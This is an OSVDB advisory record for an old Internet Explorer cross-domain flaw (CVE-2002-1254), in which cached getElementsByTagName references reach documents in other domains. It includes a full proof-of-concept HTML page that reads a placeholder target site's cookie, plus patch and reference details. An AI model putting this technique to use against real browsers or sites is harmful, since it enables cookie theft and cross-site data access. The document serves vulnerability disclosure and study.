Microsoft IE getElementsByTagName Object Caching

2002-10-04T00:00:00
ID OSVDB:2984
Type osvdb
Reporter OSVDB
Modified 2002-10-04T00:00:00

Description

Vulnerability Description

Microsoft Internet Explorer contains a flaw that may allow a remote attacker to execute malicious JavaScript in restricted domains. The issue occurs when two windows communicate: the security checks that ensure both pages are in the same security zone/domain wrongly assume that certain cached objects are only ever called through their respective window. Because of this incorrect assumption, a remote attacker can cache a method of one document and later invoke it against a separate document in another domain. This would allow the attacker to gain access to site content, steal cookies, read files from the local machine or execute programs on the victim's computer.

Technical Description

Each item in the list below consists of three parts: "Cache" shows how to cache the vulnerable object, "Exploit" shows how the vulnerability works in context, and "Impact" details the implications of the vulnerability.

getElementsByTagName

Cache: var fVuln=oWin.document.getElementsByTagName;
Exploit: alert(fVuln("BODY")[0].document.cookie);
Impact: Full access.
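The Cache and Exploit lines above are fragments; the following page puts them into the complete object-caching sequence implied by the description (cache the method while the second window is still same-origin, navigate that window to the target domain, then call the cached method). This is an added example, not part of the OSVDB record or the GreyMagic advisory. The file names, the target URL and the timer delays are placeholders chosen for illustration, and the page only behaves as described on an IE build without the MS02-066 patch; on a patched or modern browser the call in the try block throws and the catch branch runs, which makes the page a quick check for whether a browser is affected.

```html
<!-- Added worked example; not code from the advisory or from Microsoft.
     All URLs are hypothetical placeholders. -->
<html>
<head>
<title>getElementsByTagName object caching demo</title>
<script type="text/javascript">
var oWin = null;   // the second window the attacker controls
var fVuln = null;  // cached reference to that window's document.getElementsByTagName

function run() {
  // Step 1: open a window on the attacker's own domain. While oWin and this
  // page share a domain, reading oWin.document is legitimately permitted.
  oWin = window.open("blank.html", "victim"); // hypothetical same-domain page

  // Step 2 (Cache): after the same-domain page has loaded, keep a reference to
  // its document.getElementsByTagName method. This is the advisory's Cache line.
  setTimeout(function () {
    fVuln = oWin.document.getElementsByTagName;

    // Step 3: navigate the same window to the target site. oWin's document now
    // belongs to another domain, but the cached method still operates on it.
    oWin.location.href = "http://target.example/"; // hypothetical target

    // Step 4 (Exploit): once the target has loaded, call the cached method.
    // The flawed check assumes fVuln is only ever invoked through oWin and so
    // does not compare the caller's domain with the document's current domain.
    setTimeout(exploit, 3000); // placeholder delay; long enough for the load
  }, 1000);                    // placeholder delay for blank.html to load
}

function exploit() {
  try {
    var body = fVuln("BODY")[0];       // BODY element of the *target* document
    var cookie = body.document.cookie; // cross-domain read; the advisory's Exploit line
    document.getElementById("out").innerText = "Vulnerable: " + cookie;
  } catch (e) {
    // An IE build with MS02-066 applied (or any current browser) re-checks the
    // domain at call time and throws here instead of returning the cookie.
    document.getElementById("out").innerText = "Blocked: " + e.message;
  }
}
</script>
</head>
<body onload="run()">
<div id="out">Running...</div>
</body>
</html>
```

The point to take from the sequence is that the reference was obtained legitimately in Step 2; the flaw is that the browser trusted that earlier check instead of re-evaluating the domain relationship when the cached method was actually called in Step 4, after the window had moved to a different domain.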

Solution Description

Microsoft has released a patch to address this vulnerability (Microsoft Security Bulletin MS02-066, listed in the references). No workaround other than applying the patch is known.

Short Description

Microsoft Internet Explorer contains a flaw that may allow a remote attacker to execute malicious JavaScript in restricted domains. The issue occurs when two windows communicate: the security checks that ensure both pages are in the same security zone/domain wrongly assume that certain cached objects are only ever called through their respective window. Because of this incorrect assumption, a remote attacker can cache a method of one document and later invoke it against a separate document in another domain. This would allow the attacker to gain access to site content, steal cookies, read files from the local machine or execute programs on the victim's computer.

References:

Microsoft Security Bulletin: MS02-066
ISS X-Force ID: 10438
Generic Informational URL: http://sec.greymagic.com/adv/gm012-ie/
CVE ID: CVE-2002-1254
Bugtraq ID: 6028